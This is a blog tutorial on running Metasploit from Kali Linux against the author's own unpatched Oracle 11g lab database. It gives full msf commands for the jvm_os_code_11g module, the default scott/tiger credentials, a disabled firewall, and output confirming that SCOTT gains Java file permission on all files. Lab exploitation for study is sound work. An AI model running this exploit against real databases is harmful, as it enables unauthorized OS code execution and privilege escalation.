Bingo! I’ve done it! I’ve got Metaspoit working against an Oracle database. And in this blogpost I’ll explain how you can do it too.
Step 0. Your soon to be powned Oracle database
Let’s assume you already have a virtual machine with an Oracle database for demoing purposes. I have an 18.104.22.168 database on a host on VirtualBox. Make sure you have a hostname, listener port number and instance name ready for later testing purposes.
Step 1. Install Kali Linux 2
This step is the easiest. Really. You can download a Prebuilt Kali Linux 2 installation on VirtualBox or VMWare. In this example I’ve used VirtualBox.
Unzip it, start it. Log in with user root, password toor. There you go. The virtual machine has Metaspoit Framework and many other hackertools installed. You can use these tools right away.
Notice that you don’t have to register for this version of Metasploit either.
(Tip: Kali Linux 2 locks your screen after a while and using your mouse doesn’t make it come up with a way to log in and unlock it. Hit the enter key though and it comes back to life.)
Step 2. Install an Oracle Instant Client, and Ruby OCI8.
When you use Metasploit to use an exploit against your Oracle database, you’ll get an error:
[-] Failed to load the OCI library: cannot load such file -- oci8 [-] Try 'gem install ruby-oci8' [*] Auxiliary module execution completed
The helpful hint to do gem install ruby-oci8 won’t work. You need to have an Oracle client first. You’ll find complete instructions what to do next here:
Step 3. Configure the network of your VirtualBox-es.
From your Kali Linux 2 install you might find (actually it’s rather likely) that you can’t even ping to you VM with your Oracle database. I’ve learned how to solve that. There are a couple of things you have to look at:
- Make sure you are in the same IP range / subnet and make sure that’s in the range of your virtual network.
- Make sure your network settings of your VMs are set as Bridged.
- After setting your network connections correctly, try to ping from your Kali Linux 2 setup to your Oracle db host.
Step 4. Turn off the firewall of the database server
Yes, my Linux host wasn’t exactly a push over. I had to disable the firewall to do the Metasploit trick.
service iptables status service iptables stop chkconfig iptables off
Step 5. Create a tnsnames.ora (really?)
Yes, I was totally surprised about this one. Why not just use a JDBC thin driver? But if you skip this step, you’ll get an ORA-12543: TNS:destination host unreachable error. If you’ve followed the instructions in the link of Step 2, you’ll have a TNS_ADMIN pointing to your Instant Client directory and you can put your tnsnames.ora there.
Start Metasploit and let’s play around!
All right, let’s see what we are capable of now. Let’s start Metasploit.
First have a look at the long list of possible exploits for Oracle software:
msf exploit(psexec) > search oracle Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/oracle/ora_ntlm_stealer 2009-04-07 normal Oracle SMB Relay Code Execution auxiliary/admin/oracle/oracle_login 2008-11-20 normal Oracle Account Discovery auxiliary/admin/oracle/oracle_sql 2007-12-07 normal Oracle SQL Generic Query auxiliary/admin/oracle/oraenum normal Oracle Database Enumeration auxiliary/admin/oracle/osb_execqr 2009-01-14 normal Oracle Secure Backup exec_qr() Command Injection Vulnerability [..]
Granted, there are a lot of exploits for very old Oracle database versions and Java exploits here. But there is at least one 11g R2 exploit that I can run against my unpatched database.
msf auxiliary(jvm_os_code_11g) > set RHOST 192.168.56.163 RHOST => 192.168.56.163 msf auxiliary(jvm_os_code_11g) > set SID KNUTSEL SID => KNUTSEL
Metasploit tries to connect with uppercase SCOTT/TIGER. Apparently they never heard about case sensitive passwords. But Oracle will give a ORA-01017 error on that. So I’ve changed these in lowercase:
msf auxiliary(jvm_os_code_11g) > set dbuser scott dbuser => scott msf auxiliary(jvm_os_code_11g) > set dbpass tiger dbpass => tiger
So these are the options we have now:
msf auxiliary(jvm_os_code_11g) > show options Module options (auxiliary/sqli/oracle/jvm_os_code_11g): Name Current Setting Required Description ---- --------------- -------- ----------- CMD echo metasploit >> %SYSTEMDRIVE%\\unbreakable.txt no CMD to execute. DBPASS tiger yes The password to authenticate with. DBUSER scott yes The username to authenticate with. RHOST 192.168.56.163 yes The Oracle host. RPORT 1521 yes The TNS port. SID KNUTSEL yes The sid to authenticate with.
Let’s run the exploit:
msf auxiliary(jvm_os_code_11g) > run [*] Attempting to grant JAVA IO Privileges [*] Attempting to execute OS Code [*] Auxiliary module execution completed
Did it work? Well, let’s see if scott got those Java permissions:
SQL> select grantee_name, type_name, name from USER_JAVA_POLICY where grantee_name='SCOTT'; GRANTEE_NAME TYPE_NAME NAME ------------------------------ ------------------------------ ------------------------------ SCOTT java.io.FilePermission <<ALL FILES>>
Yep, that did the trick.
And with that it’s achievement unlocked: hacking an Oracle database with Metasploit. In a future blogpost I’ll try a couple of other exploits from Metasploit.
If you have any questions about using Metasploit against Oracle, please let me know.